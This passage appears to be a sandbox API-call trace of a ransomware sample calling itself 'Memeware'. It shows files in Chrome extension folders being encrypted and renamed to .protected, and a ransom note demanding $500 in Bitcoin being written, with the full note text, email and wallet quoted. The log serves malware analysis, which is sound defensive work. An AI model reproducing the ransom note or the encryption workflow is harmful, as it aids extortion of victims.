pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json.protected") returned 165 [0080.741] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json.protected")) returned 1 [0080.742] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.742] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.742] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\RESTORE_FILES.txt") returned 159 [0080.742] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0x164 [0080.742] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.742] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.743] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.743] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.743] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.743] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.743] CloseHandle (hObject=0x164) returned 1 [0080.743] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.743] lstrcmpiW (lpString1="vi", lpString2="Windows") returned -1 [0080.743] lstrcmpiW (lpString1="vi", lpString2="Program Files") returned 1 [0080.743] lstrcmpiW (lpString1="vi", lpString2="Program Files (x86)") returned 1 [0080.743] lstrcmpiW (lpString1="vi", lpString2="$Recycle.bin") returned 1 [0080.743] lstrcmpiW (lpString1="vi", lpString2="System Volume Information") returned 1 [0080.743] wnsprintfW (in: 
pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi") returned 141 [0080.743] lstrcmpW (lpString1="vi", lpString2=".") returned 1 [0080.743] lstrcmpW (lpString1="vi", lpString2="..") returned 1 [0080.743] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\*") returned 143 [0080.743] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.744] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.744] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.744] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.744] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.744] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.744] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\.") returned 143 [0080.744] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.744] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.744] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.744] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.744] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.744] 
lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.744] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.744] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\..") returned 144 [0080.744] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.744] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.744] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.744] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.744] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.744] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.744] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.744] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.744] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json") returned 155 [0080.744] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.744] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.744] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.744] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.744] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.745] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json") returned 155 [0080.745] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.745] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json") returned 155 [0080.745] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.745] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json") returned 155 [0080.745] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.745] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xdd, lpOverlapped=0x0) returned 1 [0080.745] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff23, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.746] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xdd, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xdd, lpOverlapped=0x0) returned 1 [0080.746] SetFilePointerEx (in: hFile=0x168, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.746] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.746] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.746] CloseHandle (hObject=0x168) returned 1 [0080.746] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json.protected") returned 165 [0080.746] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json.protected")) returned 1 [0080.746] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.747] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.747] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\RESTORE_FILES.txt") returned 159 [0080.747] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.747] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.747] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.748] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.748] WriteFile (in: hFile=0x164, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.748] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.748] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.748] CloseHandle (hObject=0x164) returned 1 [0080.748] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.748] lstrcmpiW (lpString1="zh_CN", lpString2="Windows") returned 1 [0080.748] lstrcmpiW (lpString1="zh_CN", lpString2="Program Files") returned 1 [0080.748] lstrcmpiW (lpString1="zh_CN", lpString2="Program Files (x86)") returned 1 [0080.748] lstrcmpiW (lpString1="zh_CN", lpString2="$Recycle.bin") returned 1 [0080.748] lstrcmpiW (lpString1="zh_CN", lpString2="System Volume Information") returned 1 [0080.748] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN") returned 144 [0080.748] lstrcmpW (lpString1="zh_CN", lpString2=".") returned 1 [0080.748] lstrcmpW (lpString1="zh_CN", lpString2="..") returned 1 [0080.748] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\*") returned 146 [0080.748] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.749] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.749] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.749] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.749] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.749] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.749] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\.") returned 146 [0080.749] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.749] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.749] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.749] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.749] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.749] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.749] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.749] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\..") returned 147 [0080.749] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.749] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.749] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.749] lstrcmpiW 
(lpString1="messages.json", lpString2="Windows") returned -1 [0080.749] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.749] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.749] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.749] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.749] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\messages.json") returned 158 [0080.750] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.750] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.750] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.750] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.750] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_cn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.750] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\messages.json") returned 158 [0080.750] StrStrW 
(lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.750] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\messages.json") returned 158 [0080.750] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.750] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\messages.json") returned 158 [0080.750] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.750] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb0, lpOverlapped=0x0) returned 1 [0080.751] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff50, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.751] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb0, lpOverlapped=0x0) returned 1 [0080.751] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.751] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.751] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.751] CloseHandle (hObject=0x168) returned 1 [0080.751] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, 
